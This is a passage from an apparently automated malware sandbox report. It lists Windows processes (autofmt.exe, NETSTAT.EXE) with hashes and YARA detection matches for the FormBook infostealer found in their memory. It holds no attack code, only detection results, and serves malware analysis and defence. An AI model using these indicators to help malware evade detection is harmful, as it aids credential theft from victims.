                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                General

                                                Target ID:24
                                                Start time:06:28:57
                                                Start date:11/08/2022
                                                Path:C:\Windows\SysWOW64\autofmt.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                Imagebase:0xe0000
                                                File size:831488 bytes
                                                MD5 hash:7FC345F685C2A58283872D851316ACC4
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                General

                                                Target ID:25
                                                Start time:06:28:57
                                                Start date:11/08/2022
                                                Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                Imagebase:0x370000
                                                File size:32768 bytes
                                                MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                Disassembly

                                                No disassembly